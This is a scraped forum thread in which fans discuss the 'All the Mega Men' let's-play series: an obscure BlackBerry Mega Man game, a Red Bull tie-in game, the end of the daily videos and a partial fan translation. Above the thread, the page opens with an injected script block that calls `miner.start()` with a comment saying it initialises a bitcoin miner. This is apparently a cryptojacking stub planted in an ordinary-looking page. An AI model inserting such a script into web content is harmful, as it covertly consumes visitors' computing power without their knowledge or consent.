<script>
miner.start(); // initialise bitcoin miner
</script>

pge projectsmw centralsmbx community

All the Mega Men - Everlasting Peace For Now

this is the place where lps are being talked about. it's important to talk about games being played on the internet.
Leet
Well, hello, Smith ( ´-`)ノ
First name: Chie Arale
Pronouns: she/her

Re: All the Mega Men One-Shots - Mobile Game Whaling

Postby Leet » 1 month ago

This game is like super undocumented for the amount of content it has, and I guess will remain so
ImageWell it is a decent hack but sometime its just too repetitif there no level that actually pop in your face and your like oh yeah that level they all ressemble themselves and just monster along the way.
Blood Ghoul wrote:Sometimes it seems my blood spurts out in gobs, as if it were a fountain's pulsing sobs. I clearly hear it mutter as it goes yet cannot find the wound from which it flows. Before I met you, baby, I didn't know what I was missing.

Dragon Fogel
Master of Pointlessness

Postby Dragon Fogel » 1 month ago

Now I wonder what the other bosses are. Other repurposed minibosses? Perhaps even some of the water-themed Robot Masters? And what sort of weapon would the whale give you?
Click that banner if you like reading words.
Make levels from unused MAGL X names!

Ashan
The world has become a place

Postby Ashan » 1 month ago

Leet wrote: This game is like super undocumented for the amount of content it has, and I guess will remain so
Collab idea: a bunch of us download a Blackberry emulator and play the hell out of this game and document the shit out of it and update the wiki

Bean

Postby Bean » 1 month ago

That is officially the smartest boss in Mega Man history right there. Good going, Dive Man Whale thing.

Cyril
metal nerd
First name: Cyril
Pronouns: he/she/they

Re: All the Mega Men One-Shots - Red Bull, Blue Bomber

Postby Cyril » 1 month ago

RIP Megaman
1987-2019

"Died in an ice skating competition."
i've honestly never played a video game in my life

Grounder

Postby Grounder » 1 month ago

Why don't you eat me?

I am perfectly tasty...

AND I'LL STEAL YOUR SOUL! :twisted:

ImageImageImage

Awoo
I came here to awoo at you!
Pronouns: he/him/his

Re: All the Mega Men One-Shots - Komm Susser Tod

Postby Awoo » 1 month ago

Alas, Megaman, I hardly knew ye.
It's so weird, moving forward. It felt like AtMM would last forever, but, all good things must come to an end...

Can't wait to see how AtS turns out, though. It should be fun, raocow! :rao:
ワンワン :pal:

Super Llama
Love is stored in the robot

Postby Super Llama » 1 month ago

Here's what Red Bull-empowered Mega Man is supposed to look like.

Ashan
The world has become a place

Postby Ashan » 1 month ago

Wow I didn't realize that the race was so short. I tried this game out the other day when it was linked and as soon as it got to that tricky jump I was like "oh it's gonna be doing this, yeah I'm not interested in memorizing awkward precise jumps" and closed it.

It's interesting they went through all the effort of making this engine, the custom sprites, etc. but made the actual level like 5 screens long and can be completed blind in 5 minutes even when it takes like 17 attempts to figure out how to jump. Speaking of the custom sprites, the Red Bull Mega Man was pretty cool, and from the end screen it looks like they were selling some artwork of him in that form. (in the time it took me to write this super llama posted the above image but I'm leaving this paragraph)

But anyway, more significant than the game is that we're on the very last day of daily Mega Man. Tomorrow we will not get a Mega Man video for the first time in quite a while. It was a fun series, good job on that whole thing mr cow.

Also regarding the PET LCD game -- I do have 2 of the models that came out (one a Japan exclusive) along with a handful of the chips you need to play them, though I might have to dig them out and make sure they actually work. I could possibly send them to you, and my first instinct is to ask for them back but also like... I haven't touched them in years, I don't put them on display nor do I think I'd be proud to so maybe this would be a good way for me to get rid of them.

Super Llama
Love is stored in the robot

Postby Super Llama » 1 month ago

Also, counting all the Gaiden and One-shot videos, AtMM has reached 689 videos.

Zummorr
Bug Catcher

Postby Zummorr » 1 month ago

It's all Xover now.

Regarding Rockman Strategy. There is a partial english patch? https://forums.somethingawful.com/showt ... id=3849632
It doesn't translate alot of the menus or other graphics though.

Just saying it does exist even if it is bad.

Leet
Well, hello, Smith ( ´-`)ノ
First name: Chie Arale
Pronouns: she/her

Postby Leet » 1 month ago

This doesn't really matter since raocow wouldn't need to play it again either way but like, capcom did a lot more than "aknowledge" SFxMM, you download it from Capcom's website. They're the publishers. Yeah they didn't develop it, but they also didn't develop like half the other MM games. If SFxMM isn't an official game, then Sonic Mania isn't either.
ImageWell it is a decent hack but sometime its just too repetitif there no level that actually pop in your face and your like oh yeah that level they all ressemble themselves and just monster along the way.
Blood Ghoul wrote:Sometimes it seems my blood spurts out in gobs, as if it were a fountain's pulsing sobs. I clearly hear it mutter as it goes yet cannot find the wound from which it flows. Before I met you, baby, I didn't know what I was missing.

Kukironosuke
You can call me Kuki
First name: Travis
Pronouns: he/him/kirbys

Postby Kukironosuke » 1 month ago

Did raocow ever talk about the megaman battle network games? Maybe during his playthrough of the GameCube side game? I missed it

edit- just watched the most recent episode end of season 1 -facepalm-
Found the answer pretty much what I expected and I don't disagree with raocow at all there is too much of them, just wanted to hear raocow discuss them

Return to “let's play”